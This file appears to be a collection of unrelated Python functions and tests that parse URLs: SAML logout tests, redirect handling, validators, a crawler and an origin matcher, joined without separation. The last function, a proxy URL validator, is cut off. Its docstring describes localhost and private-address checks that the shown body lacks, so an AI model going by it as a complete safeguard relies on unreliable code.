def testProcessSLORequestInvalidValid(self):
    """
    Tests the process_slo method of the OneLogin_Saml2_Auth class

    The same deflated Logout Request is processed three times on one auth
    object: with the settings as loaded, with strict mode switched on
    (an 'invalid_logout_request' error is expected) and with strict mode
    switched off again.
    """
    settings_info = self.loadSettingsJSON()
    request_data = self.get_request()
    request_file = join(self.data_path, 'logout_requests', 'logout_request_deflated.xml.base64')
    request_data['get_data']['SAMLRequest'] = self.file_contents(request_file)
    auth = OneLogin_Saml2_Auth(request_data, old_settings=settings_info)

    # First pass: no errors, redirect to the IdP SLO endpoint with a response.
    first_target = auth.process_slo(True)
    first_query = parse_qs(urlparse(first_target).query)
    self.assertEqual(len(auth.get_errors()), 0)
    slo_url = settings_info['idp']['singleLogoutService']['url']
    self.assertIn(slo_url, first_target)
    self.assertIn('SAMLResponse', first_query)
    # Disabled check kept from the original test:
    # self.assertNotIn('RelayState', first_query)

    # Second pass in strict mode: fails due to destination mismatch.
    auth.set_strict(True)
    auth.process_slo(True)
    self.assertEqual(auth.get_errors(), ['invalid_logout_request'])

    # Third pass: strict mode off again, the request is accepted once more.
    auth.set_strict(False)
    second_target = auth.process_slo(True)
    second_query = parse_qs(urlparse(second_target).query)
    self.assertEqual(len(auth.get_errors()), 0)
    slo_url = settings_info['idp']['singleLogoutService']['url']
    self.assertIn(slo_url, second_target)
    self.assertIn('SAMLResponse', second_query)
def make_absolute_redirect_uri(self, uri):
    """Rewrite a host-relative ``redirect_uri`` query parameter as a full URL.

    Internal redirect URIs such as `/user/foo/oauth_handler` are allowed in
    jupyterhub, but oauthlib prohibits them.  When the request's
    ``redirect_uri`` argument starts with ``/``, the protocol and ``Host``
    header of the current request are prepended, and the first
    ``redirect_uri`` pair in the query string of *uri* is replaced with that
    absolute value.  Otherwise *uri* is returned untouched.

    Currently unused in favor of monkeypatching
    oauthlib.is_absolute_uri to skip the check
    """
    relative_target = self.get_argument('redirect_uri')
    if not (relative_target and relative_target.startswith('/')):
        return uri

    # make absolute local redirects full URLs
    # to satisfy oauthlib's absolute URI requirement
    origin = self.request.protocol + "://" + self.request.headers['Host']
    absolute_target = origin + relative_target

    parts = urlparse(uri)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    # Only the first redirect_uri pair is rewritten.
    first_match = next(
        (pos for pos, pair in enumerate(pairs) if pair[0] == 'redirect_uri'),
        None,
    )
    if first_match is not None:
        pairs[first_match] = ('redirect_uri', absolute_target)
    return urlunparse(parts._replace(query=urlencode(pairs)))
def Url(v):
    """Verify that the value is a URL.

    The value is handed to ``urlparse.urlparse``; if parsing succeeds the
    value is returned unchanged.

    :param v: candidate URL
    :returns: ``v`` itself
    :raises ValueError: if the value cannot be parsed
    """
    try:
        urlparse.urlparse(v)
    except Exception:
        # Only ordinary errors are translated; KeyboardInterrupt and
        # SystemExit must keep propagating instead of becoming ValueError.
        raise ValueError("not a valid URL: %r" % (v,))
    return v
def testLoginIsPassive(self):
    """
    Tests the login method of the OneLogin_Saml2_Auth class
    Case Login with and without the passive flag. An AuthN Request is
    built and the redirect target is inspected: IsPassive="true" must
    only appear when login() is called as login(return_to, False, True).
    """
    settings_info = self.loadSettingsJSON()
    return_to = u'http://example.com/returnto'
    sso_url = settings_info['idp']['singleSignOnService']['url']

    def build_authn_request(*login_args):
        # Run one login on a fresh auth object, check the redirect points
        # at the IdP SSO endpoint, and return the decoded AuthN request.
        auth = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url = auth.login(return_to, *login_args)
        parsed_query = parse_qs(urlparse(target_url)[4])
        self.assertIn(sso_url, target_url)
        self.assertIn('SAMLRequest', parsed_query)
        return compat.to_string(
            OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query['SAMLRequest'][0]))

    # Default arguments: not passive.
    self.assertNotIn('IsPassive="true"', build_authn_request())
    # Both flags explicitly False: not passive.
    self.assertNotIn('IsPassive="true"', build_authn_request(False, False))
    # Third positional argument True (presumably is_passive): passive.
    self.assertIn('IsPassive="true"', build_authn_request(False, True))
def _isswe(self, url): if re.search(r".se$", urlparse(url).netloc): return "sasong" elif re.search(r".dk$", urlparse(url).netloc): return "saeson" else: return "sesong"
def __init__(self, *args, **kwargs):
    """Load DNS and realm settings from the Kerberos profile.

    Populates the private config dict with two keys:

    * ``"dns"``: boolean taken from ``libdefaults/dns_fallback`` and
      overridden by ``libdefaults/dns_lookup_kdc`` when that key is present
      (both default to True).
    * ``"realms"``: mapping of realm name to a dict that maps each server
      key listed in ``self.CONFIG_KEYS`` to a list of URL strings.

    ``*args`` and ``**kwargs`` are accepted but not used in this body.
    """
    self.__config = {}
    with KRB5Profile() as prof:
        # Load DNS setting
        self.__config["dns"] = prof.get_bool("libdefaults",
                                             "dns_fallback",
                                             default=True)
        # dns_lookup_kdc, when configured, takes precedence over dns_fallback.
        if "dns_lookup_kdc" in dict(prof.section("libdefaults")):
            self.__config["dns"] = prof.get_bool("libdefaults",
                                                 "dns_lookup_kdc",
                                                 default=True)

        # Load all configured realms
        self.__config["realms"] = {}
        for realm, values in prof.section("realms"):
            rconf = self.__config["realms"].setdefault(realm, {})
            for server, hostport in values:
                # Ignore realm entries that are not server definitions.
                if server not in self.CONFIG_KEYS:
                    continue

                parsed = urlparse.urlparse(hostport)
                # A bare "host[:port]" value has no hostname once parsed;
                # prepend a scheme so it parses as a URL ("kerberos" for
                # kdc entries, "kpasswd" for everything else).
                if parsed.hostname is None:
                    scheme = {'kdc': 'kerberos'}.get(server, 'kpasswd')
                    parsed = urlparse.urlparse(scheme + "://" + hostport)

                # For admin_server entries an explicit port is dropped and
                # the host is re-parsed under the kpasswd scheme.
                if parsed.port is not None and server == 'admin_server':
                    hostport = hostport.split(':', 1)[0]
                    parsed = urlparse.urlparse("kpasswd://" + hostport)

                rconf.setdefault(server, []).append(parsed.geturl())
def check(self, domain):
    """Score how the naked domain and its ``www.`` variant redirect.

    Both ``http://<domain>`` and ``http://www.<domain>`` are fetched with
    ``requests.get`` and the host of each final URL is inspected.

    :param domain: bare domain name, without scheme or ``www.`` prefix
    :returns: dict with ``"score"`` (1 when www ends up on the naked
        domain, -1 when the naked domain ends up on www, 0 otherwise) and
        a human-readable ``"reason"`` (empty when neither case applies)
    """
    import requests
    from urllib.parse import urlparse

    score = 0
    reason = ""

    # .url on each response is used as the final location of the request.
    nakedreq = requests.get("http://%s" % domain)
    nakedreqURL = urlparse(nakedreq.url)
    wwwreq = requests.get("http://www.%s" % domain)
    wwwreqURL = urlparse(wwwreq.url)

    if nakedreqURL.netloc == domain:
        # Naked domain is served as-is; neutral unless www also lands here.
        score = 0
        reason = "Naked domain (%s) does not redirect to www (but www does not redirect to naked)" % domain
        if wwwreqURL.netloc == domain:
            score = 1
            reason = "www.%s redirects to %s" % (domain, domain)
    elif nakedreqURL.netloc == "www.%s" % domain:
        score = -1
        reason = "Naked domain redirects to www."

    return {
        "score": score,
        "reason": reason
    }
def test_suomifi_logout_sp_request_invalid_token(django_client, django_user_model, fixed_saml_id):
    '''Logout with an unrecognized id_token_hint but a valid session.'''
    client_app = create_oidc_client()
    account = create_user(django_user_model)
    create_social_user(account)
    create_oidc_token(account, client_app)
    django_client.login(username=TEST_USER, password=TEST_PASSWORD)

    query = urlencode({
        'id_token_hint': ID_TOKEN_JWT_INVALID,
        'post_logout_redirect_uri': REDIRECT_URI,
    })
    response = django_client.get(reverse('end-session') + '?{}'.format(query))

    # If the token hint is not recognized but the client has valid session we
    # still perform logout as we are able to deduce enough information to log
    # the client out. We are unable to remove the ID token and we do not have
    # a way to deduce the final redirect after Suomi.fi callback so the
    # RelayState parameter will be missing from the SAML request.
    assert Token.objects.count() == 1
    assert response.status_code == 302

    redirect = urlparse(response.url)
    redirect_params = parse_qs(redirect.query)
    saml_request = SAMLUtils.decode_base64_and_inflate(redirect_params['SAMLRequest'][0])

    idp_settings = getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')
    slo_url = urlparse(idp_settings['suomifi']['logout_url'])
    wanted_request = load_file('suomifi_logout_request.xml')
    wanted_signature = load_file('suomifi_logout_without_relaystate_signature.b64').decode()

    # Scheme, host and path of the redirect must match the configured SLO URL.
    assert redirect[:3] == slo_url[:3]
    assert saml_request == wanted_request
    assert 'RelayState' not in redirect_params
    assert redirect_params['Signature'][0] == wanted_signature
def test_suomifi_idp_logout(django_client, fixed_saml_id):
    '''Suomi.fi use cases #4: receiving logout request, and #6: sending logout response'''
    create_oidc_client()

    query = urlencode({
        'SAMLRequest': load_file('suomifi_idp_logout_request_encoded.b64').decode(),
        'RelayState': RELAY_STATE,
        'SigAlg': 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256',
        'Signature': load_file('suomifi_idp_logout_signature.b64').decode()
    })
    response = django_client.get(
        reverse('auth_backends:suomifi_logout_callback') + '?{}'.format(query))

    # IdP initiated logout request results in redirect to Suomi.fi SLO URL with
    # SAML response and RelayState from request.
    assert response.status_code == 302

    redirect = urlparse(response.url)
    redirect_params = parse_qs(redirect.query)
    saml_response = SAMLUtils.decode_base64_and_inflate(redirect_params['SAMLResponse'][0])

    idp_settings = getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')
    slo_url = urlparse(idp_settings['suomifi']['logout_url'])
    wanted_response = load_file('suomifi_idp_logout_response.xml')
    wanted_signature = load_file('suomifi_idp_logout_response_signature.b64').decode()

    # Scheme, host and path of the redirect must match the configured SLO URL.
    assert redirect[:3] == slo_url[:3]
    assert saml_response == wanted_response
    assert redirect_params['RelayState'][0] == RELAY_STATE
    assert redirect_params['Signature'][0] == wanted_signature
def status():
    """Report whether every project's Travis URL still resolves.

    Each project in PROJECTS_FILE is looked up through the API host derived
    from its 'travis url'. On a 404 the matching Github path is fetched to
    detect a moved repository. The first problem found becomes the status
    text; otherwise the status is 'ok'. The result is returned as JSON.
    """
    with open(PROJECTS_FILE) as projects_fh:
        projects = json.load(projects_fh)

    try:
        for project in projects:
            travis_parts = urlparse(project['travis url'])
            host, path = travis_parts.netloc, travis_parts.path

            resp = get('https://api.{host}/repos{path}'.format(host=host, path=path))

            # See if the Github URL has moved.
            if resp.status_code == 404:
                resp = get('https://github.com{path}'.format(path=path))
                if resp.status_code == 200:
                    github_path = urlparse(resp.url).path
                    if github_path != path:
                        template = 'Error in {guid}: {path} has moved to {github_path}'
                        raise Exception(template.format(
                            guid=project['guid'], path=path, github_path=github_path))

            if resp.status_code != 200:
                raise Exception('Missing {guid}: no {travis url}'.format(**project))
    except Exception as e:
        outcome = str(e)
    else:
        outcome = 'ok'

    return jsonify(dict(status=outcome, updated=int(time()),
                        dependencies=['Travis', 'Github'], resources={}))
def test_suomifi_logout_sp_request(django_client, django_user_model, fixed_saml_id):
    '''Suomi.fi use case #3: sending logout request'''
    client_app = create_oidc_client()
    account = create_user(django_user_model)
    create_social_user(account)
    create_oidc_token(account, client_app)
    django_client.login(username=TEST_USER, password=TEST_PASSWORD)

    query = urlencode({
        'id_token_hint': ID_TOKEN_JWT,
        'post_logout_redirect_uri': REDIRECT_URI,
    })
    response = django_client.get(reverse('end-session') + '?{}'.format(query))

    # Logout request results in redirect to Suomi.fi with a SAML message in
    # query parameters. The OIDC token for the user is deleted.
    assert Token.objects.count() == 0
    assert response.status_code == 302

    redirect = urlparse(response.url)
    redirect_params = parse_qs(redirect.query)
    saml_request = SAMLUtils.decode_base64_and_inflate(redirect_params['SAMLRequest'][0])

    idp_settings = getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')
    slo_url = urlparse(idp_settings['suomifi']['logout_url'])
    wanted_request = load_file('suomifi_logout_request.xml')
    wanted_signature = load_file('suomifi_logout_signature.b64').decode()

    # Scheme, host and path of the redirect must match the configured SLO URL.
    assert redirect[:3] == slo_url[:3]
    assert saml_request == wanted_request
    assert redirect_params['RelayState'][0] == '{"cli": "test_client", "idx": 0}'
    assert redirect_params['Signature'][0] == wanted_signature
def get_referrer(self, oldurl, newurl):
    """
    Decide which referrer, if any, accompanies a request to *newurl*.

    Reference: https://en.wikipedia.org/wiki/HTTP_referer

    :param oldurl: Current absolute URL
    :type oldurl: str or None
    :param newurl: Target absolute URL
    :type newurl: str
    :returns: *oldurl*, or None when no referrer should be sent
    :rtype: str or None
    """
    if oldurl is None:
        return None

    source_scheme = urlparse(oldurl).scheme
    target_scheme = urlparse(newurl).scheme

    # Do not leak secure URLs to insecure URLs
    downgrade = source_scheme == 'https' and target_scheme != 'https'
    # Reloading the page. Usually no referrer.
    reload_same_page = oldurl == newurl

    # TODO maybe implement some *optional* privacy features:
    # * do not leak referrer to other domains (often breaks websites)
    # * send a fake referrer (root of the current domain)
    # * never send the referrer
    # Inspired by the RefControl Firefox addon.
    return None if (downgrade or reload_same_page) else oldurl
def validate_url(url: str):
    """Assert that *url* can be parsed by ``urlparse``.

    Returns None on success. A ``ValueError`` from the parser is re-raised
    as an ``AssertionError`` chained to the original error.
    """
    try:
        urlparse(url)
    except ValueError as ex:
        message = "Couldn't parse given value `{}` as an URL".format(url)
        raise AssertionError(message) from ex
def relative_uri(source, target):
    """
    Make a relative URI from source to target.

    :param source: URI the result will be resolved against
    :param target: URI to express relative to *source*
    :returns: *target* unchanged when it lives under a different scheme or
        host than *source*; otherwise a relative reference made of a
        relative path plus the params, query and fragment of *target*
    """
    # URL paths always use "/" separators, so the path arithmetic must use
    # posixpath; os.path would produce backslashes on Windows.
    import posixpath

    su = urlparse.urlparse(source)
    tu = urlparse.urlparse(target)
    # params, query and fragment of the target are carried over verbatim.
    extra = list(tu[3:])
    relative = None
    if tu[0] == '' and tu[1] == '':
        # Target has neither scheme nor host: it is already a reference.
        if tu[2] == su[2]:
            relative = ''
        elif not tu[2].startswith('/'):
            relative = tu[2]
    elif su[0:2] != tu[0:2]:
        # Different scheme or host: no relative form exists.
        return target

    if relative is None:
        if tu[2] == su[2]:
            relative = ''
        else:
            relative = posixpath.relpath(tu[2], posixpath.dirname(su[2]))
    # relpath reports "same location" as "."; an empty path means the same.
    if relative == '.':
        relative = ''
    relative = urlparse.urlunparse(["", "", relative] + extra)
    return relative
def find_local_path(self, uri, default_destination=None, netloc=False, infix=""):
    """Map *uri* to a local path through the configured destinations.

    The uri is shortened step by step with ``DestinationMap.shorten`` until
    a key of ``self.mappings`` is found or nothing is left to shorten.
    Fallbacks are *default_destination* and, when *netloc* is true, the
    host part of the uri. Relative destinations are placed under
    ``self.root_folder``.

    :returns: tuple ``(base_uri, local_path)``; ``local_path`` is None when
        no destination or no postfix could be determined
    """
    base_uri = uri
    destination = None
    leftover = None
    postfix = None

    while destination is None:
        try:
            destination = self.mappings[base_uri]
        except KeyError:
            if leftover == "":
                # Nothing left to strip from the uri: give up searching.
                break
            base_uri, leftover = DestinationMap.shorten(base_uri)
        else:
            # Part of the uri after the matched base and its separator.
            postfix = uri[len(base_uri) + 1:]

    if destination is None:
        destination = default_destination

    if destination is None and netloc:
        parts = urlparse(uri)
        destination = parts.netloc
        # Skip "<scheme>://<netloc>/": 3 characters for "://" and 1 for "/".
        prefix_length = len(parts.scheme) + len(destination)
        postfix = uri[prefix_length + 4:]

    local_path = None
    if destination is not None:
        if not os.path.isabs(destination):
            destination = os.path.join(self.root_folder, destination)
        if postfix is not None:
            local_path = os.path.join(destination, infix, postfix)

    return base_uri, local_path
def get_new_command(command, settings):
    """Build a corrected ``whois`` command from the failed one.

    If the script contains a slash, the second word is treated as a full
    URL and only its host is kept. Otherwise, if it contains a dot, the
    leftmost label of the domain is dropped. Returns None when neither
    applies.
    """
    script = command.script
    url = script.split()[1]
    if '/' in script:
        return 'whois ' + urlparse(url).netloc
    if '.' in script:
        labels = urlparse(url).path.split('.')
        return 'whois ' + '.'.join(labels[1:])
    return None
def url(value):
    """Convert *value* to a string and check that ``urlparse`` accepts it.

    :returns: the string form of *value*
    :raises ValueError: if the conversion or the parsing fails
    """
    try:
        text = str(value)
        urlparse(text)
    except Exception as err:
        raise ValueError("Invalid URL `{0}`: {1}".format(value, err))
    else:
        return text
def isArticle(self, url, soup):
    """Determine whether the given url opens a news article.

    Only ``www.ratopati.com`` is recognised: the path must look like
    ``/YYYY/MM/DD/NNNNNN.html`` and the page must contain a ``div`` with
    id ``sing_cont``.

    :param url: URL of the page
    :param soup: parsed page exposing ``find(name, attrs)``
    :returns: ``[True, title, date, url]`` for an article (title is the
        UTF-8 encoded text of the div's ``h2``, date a ``datetime`` built
        from the path), otherwise ``[False]``
    """
    parsed = urlparse(url)
    path = parsed.path

    if parsed.netloc != 'www.ratopati.com':
        return [False]

    # The dot before "html" is escaped so only a literal ".html" matches.
    if re.match(r'/\d\d\d\d/\d\d/\d\d/\d\d\d\d\d\d\.html', path) is None:
        return [False]

    div = soup.find('div', {'id': 'sing_cont'})
    if div is None:
        return [False]

    articleTitle = div.h2.text.encode('utf-8', 'ignore')
    # "/YYYY/MM/DD/NNNNNN" -> ['YYYY', 'MM', 'DD'] (leading '' and id dropped)
    articleDatelst = path.split('.')[0].split('/')[1:-1]
    articleDate = datetime(int(articleDatelst[0]), int(articleDatelst[1]), int(articleDatelst[2]))
    return [True, articleTitle, articleDate, url]
def _line(self, l):	# {{{
    """Handle one received line: the request line first, header lines after.

    While ``self.address`` is None the line is treated as the request line
    ("METHOD URL STANDARD"). Once it is set, every further line is a header,
    and a blank line hands control to ``self._handle_headers()``.
    """
    if DEBUG > 4:
        log('Debug: Received line: %s' % l)
    if self.address is not None:
        # Header phase.
        if not l.strip():
            # Blank line: end of the header block.
            self._handle_headers()
            return
        try:
            key, value = l.split(':', 1)
        except ValueError:
            # No colon in the line; it is logged and otherwise ignored.
            log('Invalid header line: %s' % l)
            return
        # Header names are stored lower-cased.
        self.headers[key.lower()] = value.strip()
        return
    else:
        # Request-line phase.
        try:
            self.method, url, self.standard = l.split()
            # Use the first configured proxy prefix the url starts with;
            # the for/else leaves the prefix empty when none matches.
            for prefix in self.proxy:
                if url.startswith('/' + prefix + '/') or url == '/' + prefix:
                    self.prefix = '/' + prefix
                    break
            else:
                self.prefix = ''
            address = urlparse(url)
            # Strip the prefix from the path; an empty remainder becomes "/".
            path = address.path[len(self.prefix):] or '/'
            # Re-attach whatever followed the path in the original url.
            self.url = path + url[len(address.path):]
            self.address = urlparse(self.url)
            self.query = parse_qs(self.address.query)
        except:
            # Any failure while handling the request line is answered
            # with a 400 reply and the socket is closed.
            traceback.print_exc()
            self.server.reply(self, 400)
            self.socket.close()
        return
def test_spawn_redirect(app, io_loop):
    """The spawn page ends up on the user's server URL, whether or not the
    server was already running."""
    name = 'wash'
    cookies = app.login_user(name)
    user = app.users[orm.User.find(app.db, name)]

    # ensure wash's server isn't running:
    delete_response = api_request(app, 'users', name, 'server', method='delete', cookies=cookies)
    delete_response.raise_for_status()
    assert io_loop.run_sync(user.spawner.poll) is not None

    # test spawn page when no server is running
    spawn_response = get_page('spawn', app, cookies=cookies)
    spawn_response.raise_for_status()
    landed = urlparse(spawn_response.url)
    print(landed)
    assert landed.path == ujoin(app.base_url, 'user/%s' % name)

    # should have started server
    assert io_loop.run_sync(user.spawner.poll) is None

    # test spawn page when server is already running (just redirect)
    spawn_response = get_page('spawn', app, cookies=cookies)
    spawn_response.raise_for_status()
    landed = urlparse(spawn_response.url)
    print(landed)
    assert landed.path == ujoin(app.base_url, '/user/%s' % name)
def _do_redirect(self, response):
    """Prepare the follow-up request for a redirect response.

    The ``location`` header is turned into an absolute URL, the redirect
    limit is enforced, and the follow-up request is attached to the
    response as ``request_again``.

    :raises TooManyRedirects: when the request history has already reached
        ``request.max_redirects``
    :returns: the same *response* object
    """
    request = response.request  # done with current response
    location = response.headers.get('location')

    # Handle redirection without scheme (see: RFC 1808 Section 4)
    if location.startswith('//'):
        current_scheme = urlparse(request.full_url).scheme
        location = '%s:%s' % (current_scheme, location)

    # Facilitate non-RFC2616-compliant 'location' headers
    # (e.g. '/path/to/resource' instead of
    # 'http://domain.tld/path/to/resource')
    if not urlparse(location).netloc:
        # Compliant with RFC3986, we percent encode the url.
        location = urljoin(request.full_url, requote_uri(location))

    history = request.history
    if history and len(history) >= request.max_redirects:
        raise TooManyRedirects(response)

    params = request.inp_params.copy()
    params['history'] = copy(history) if history else []
    params['history'].append(response)

    method = request.method
    if response.status_code == 303:
        # A 303 is always followed with a body-less GET.
        method = 'GET'
        for body_key in ('data', 'files'):
            params.pop(body_key, None)

    response.request_again = request_again(method, location, params)
    return response
def parse(target, max_level, stay_local, search_string, level=1, parsed_links=None):
    """Recursively crawl *target* and record which pages match a pattern.

    :param target: URL (or path) handed to ``lxml.html.parse``
    :param max_level: deepest recursion level that is still parsed
    :param stay_local: when true, links to other hosts are skipped
    :param search_string: compiled regular expression searched in page text
    :param level: current recursion depth (1 for the start page)
    :param parsed_links: mapping of visited URL to match result; a fresh
        dict is created when omitted, and the same dict is shared by the
        recursive calls
    :returns: the ``parsed_links`` mapping
    """
    # A literal {} default would be shared by every top-level call, leaking
    # results from one crawl into the next.
    if parsed_links is None:
        parsed_links = {}

    if level > max_level:
        return parsed_links

    print("Parsing [level %d] - %s" % (level, target))
    try:
        hostname = urlparse(target)[1]
        tree = lxml.html.parse(target)
        root = tree.getroot()
        text = ''.join(root.itertext())
        parsed_links[target] = bool(search_string.search(text))
        root.make_links_absolute(root.base)
        for link in root.iterlinks():
            href = link[2]
            if stay_local and urlparse(href)[1] != hostname:
                continue
            if href not in parsed_links:
                parse(href, max_level, stay_local, search_string,
                      level + 1, parsed_links)
    except Exception as e:
        # Best effort: a page that cannot be fetched or parsed is reported
        # and the crawl carries on with what it has.
        print("Couldn't parse the target {}: {!s}".format(target, e))
    return parsed_links
def match_allowed_origin(self, parsed_origin, pattern):
    """
    Returns ``True`` if the origin is either an exact match or a match
    to the wildcard pattern.

    Compares scheme, domain, port of origin and pattern.

    A pattern may begin with a scheme, followed by a domain, or consist
    of a domain only. A domain beginning with a period matches that
    domain and all of its subdomains (for example, ``.example.com``
    matches ``example.com`` and any subdomain); the same holds with a
    scheme (for example, ``http://.example.com`` matches
    ``http://example.com``). The port after the domain may be omitted.

    Note. This function assumes that the given origin has a schema,
    domain and port, or only domain. Port is optional. An origin without
    a hostname never matches.
    """
    # Nothing to compare against; also keeps None away from the
    # string operations in is_same_domain.
    if parsed_origin.hostname is None:
        return False

    # Parse with the default (empty) scheme. Passing scheme=None makes
    # urlsplit call None.strip() on CPython builds that sanitise the
    # scheme, which raises AttributeError.
    parsed_pattern = urlparse(pattern.lower())
    if not parsed_pattern.scheme:
        # Domain-only pattern: prefix "//" so the parser sees a netloc.
        pattern_hostname = urlparse("//" + pattern).hostname or pattern
        return is_same_domain(parsed_origin.hostname, pattern_hostname)

    # Get origin.port or default ports for origin or None
    origin_port = self.get_origin_port(parsed_origin)
    # Get pattern.port or default ports for pattern or None
    pattern_port = self.get_origin_port(parsed_pattern)

    # Compares hostname, scheme, ports of pattern and origin
    if parsed_pattern.scheme == parsed_origin.scheme and origin_port == pattern_port \
            and is_same_domain(parsed_origin.hostname, parsed_pattern.hostname):
        return True
    return False
def scrape(tracker, hashes):
    """
    Query a tracker for the seed, peer and download counts of torrents.

    Args:
        tracker (str): The announce url for a tracker, usually taken
            directly from the torrent metadata
        hashes (list): A list of torrent info_hash's to query the tracker for

    Returns:
        A dict of dicts. The key is the torrent info_hash's from the
        'hashes' parameter, and the value is a dict containing "seeds",
        "peers" and "complete".
        Eg:
        {
            "2d88e693eda7edf3c1fd0c48e8b99b8fd5a820b2" :
                { "seeds" : "34", "peers" : "189", "complete" : "10" },
            "8929b29b83736ae650ee8152789559355275bd5c" :
                { "seeds" : "12", "peers" : "0", "complete" : "290" }
        }

    Raises:
        RuntimeError: for an http(s) tracker whose url lacks "announce",
            or for any scheme other than udp, http and https
    """
    tracker = tracker.lower()
    announce = urlparse(tracker)
    scheme = announce.scheme

    if scheme == "udp":
        return scrape_udp(announce, hashes)

    if scheme not in ("http", "https"):
        raise RuntimeError("Unknown tracker scheme: %s" % scheme)

    if "announce" not in tracker:
        raise RuntimeError("%s doesnt support scrape" % tracker)
    # The scrape url is the announce url with "announce" swapped out.
    scrape_url = urlparse(tracker.replace("announce", "scrape"))
    return scrape_http(scrape_url, hashes)
def check_url_redirection(self, url_record):
    """ Checks redirection in URL and saves new domains, if any

    Fills these keys of ``url_record`` and returns it: ``final_url``,
    ``recursive``, ``redirected`` and, when a non-recursive redirect
    happened, ``same_domain``. A redirect target on a new domain is
    appended to ``self.new_domains`` when it passes the checks below.
    """
    current_url = url_record['url']
    # Helper result: (is the redirect recursive?, final url)
    recursive, url = self._check_redirection(current_url)
    url_record['final_url'] = url

    if recursive:
        print('    This is a recursive redirect. Action: Skipped!')
        url_record['redirected'] = True
        url_record['recursive'] = True
    else:
        url_record['recursive'] = False
        if url == current_url:
            url_record['redirected'] = False
        else:
            url_record['redirected'] = True
            domain1 = _extract_domain(current_url)
            domain2 = _extract_domain(url)
            # NOTE(review): the extracted values are parsed again as URLs,
            # so _extract_domain presumably returns URL-like strings - confirm.
            if urlparse(domain1).netloc == urlparse(domain2).netloc:
                url_record['same_domain'] = True
            else:
                url_record['same_domain'] = False
                if domain2 not in self.new_domains:
                    # Make sure the domain is not in the blacklist
                    if urlparse(domain2).netloc not in self.blacklist:
                        # Make sure that the URL is that of a web archive snapshot
                        if '://web.archive.org/web/' in url:
                            print('    New domain found: %s' % domain2)
                            self.new_domains.append(domain2)

    return url_record
def create_graphml(dists_triu, data, time_max=164, sim_min=0.8):
    """Build a directed graph linking each item to the position chosen for it.

    Node 0 is created from ``data[0]``. For every later index ``i``,
    ``get_pos`` is asked for a position using column ``i`` of
    *dists_triu*; when it returns one, an edge ``pos -> i`` is added
    (creating either node on demand, tagged with a date and the host of
    its link), otherwise ``i`` is added to the list of rejected indices
    that is passed to later ``get_pos`` calls.

    :param dists_triu: 2-D array; ``shape[0]`` gives the item count
    :param data: sequence of dicts with ``'link'`` and ``'published'`` keys
    :param time_max: forwarded to ``get_pos``
    :param sim_min: forwarded to ``get_pos``
    :returns: the ``networkx.DiGraph``
    """
    size = dists_triu.shape[0]
    G = nx.DiGraph()
    G.add_node(0, step=0, date=0, domain=urlparse(data[0]['link']).netloc)
    date_init = data[0]['published']
    outs = []
    for i in range(1, size):
        pub_i = data[i]['published']
        column = list(dists_triu[:, i])
        pos = get_pos(data, pub_i, column, time_max, sim_min, outs)
        # Identity test: position 0 is a valid result and must not be
        # confused with "no position found".
        if pos is None:
            outs.append(i)
            continue
        if pos not in G.nodes():
            domain_1 = urlparse(data[pos]['link']).netloc
            date_1 = create_date(date_init, data[pos]['published'], 5)
            G.add_node(pos, date=date_1, domain=domain_1)
        if i not in G.nodes():
            domain_2 = urlparse(data[i]['link']).netloc
            date_2 = create_date(date_init, pub_i, 5)
            G.add_node(i, date=date_2, domain=domain_2)
        G.add_edge(pos, i)
    return G
def fix_content(content):
    """
    Parse article content to rewrite it for a better reader experience

    * non-https images are routed through ``get_camo_url`` when a
      ``CAMO_KEY`` is configured; ``srcset``/``sizes`` are dropped and the
      ``img-responsive`` class is added
    * inline ``style`` is removed from every ``div``
    * tables get the ``table-responsive`` class
    * links open in a new tab
    * non-https iframes whose host is in ``SSLIFY_HOST_LIST`` are switched
      to https

    :param content: HTML fragment as a string
    :returns: the rewritten HTML as a string
    """
    parsed_content = BeautifulSoup(content, "html.parser")
    camo_key = settings.CAMO_KEY

    for img in parsed_content.find_all('img'):
        if img.get('src') and camo_key and urlparse(img['src']).scheme != 'https':
            img['src'] = get_camo_url(img['src'])
        del img['srcset']
        del img['sizes']
        img['class'] = img.get('class', []) + ['img-responsive']

    for div in parsed_content.find_all('div'):
        del div['style']

    for table in parsed_content.find_all('table'):
        table['class'] = table.get('class', []) + ['table-responsive']

    for a in parsed_content.find_all('a'):
        a['target'] = '_blank'

    for iframe in parsed_content.find_all('iframe'):
        # An iframe may carry no src at all (e.g. srcdoc only); indexing
        # the missing attribute would raise KeyError.
        src = iframe.get('src')
        if not src:
            continue
        url = urlparse(src)
        if url.scheme != 'https' and url.netloc in SSLIFY_HOST_LIST:
            iframe['src'] = url._replace(scheme='https').geturl()

    return str(parsed_content)
def __init__(self, bucket_key, bucket_name=None, wildcard_match=False,
             aws_conn_id='aws_default', verify=None, *args, **kwargs):
    """Store the bucket/key pair and connection options.

    When *bucket_name* is omitted, *bucket_key* must be a full URL: its
    host becomes the bucket name and its path (without the leading slash)
    the key. When *bucket_name* is given, *bucket_key* must be a plain
    relative key.

    :raises AirflowException: if the bucket name cannot be derived, or if
        a full URL is passed together with an explicit bucket name
    """
    super().__init__(*args, **kwargs)

    # Parse
    key_parts = urlparse(bucket_key)
    if bucket_name is None:
        if key_parts.netloc == '':
            raise AirflowException('Please provide a bucket_name')
        bucket_name = key_parts.netloc
        bucket_key = key_parts.path.lstrip('/')
    elif key_parts.scheme != '' or key_parts.netloc != '':
        raise AirflowException('If bucket_name is provided, bucket_key' +
                               ' should be relative path from root' +
                               ' level, rather than a full s3:// url')

    self.bucket_name = bucket_name
    self.bucket_key = bucket_key
    self.wildcard_match = wildcard_match
    self.aws_conn_id = aws_conn_id
    self.verify = verify
def validate_url(request):
    """Check that a request may be proxied and return the target URL.

    The request must be an AJAX GET carrying a valid ``url`` parameter and
    a referer on this site. The target must not be this site, localhost,
    or a host resolving to a loopback/private address.

    :param request: Django request object
    :returns: the validated ``url`` parameter
    :raises AssertionError: when any check fails (kept as the failure
        signal for existing callers)
    """
    import ipaddress

    def require(condition, message):
        # Explicit raise: plain ``assert`` statements are stripped when
        # Python runs with -O, which would disable every check here.
        if not condition:
            raise AssertionError(message)

    require(request.method == "GET", "only GET requests are accepted")
    require(request.is_ajax(), "only AJAX requests are accepted")
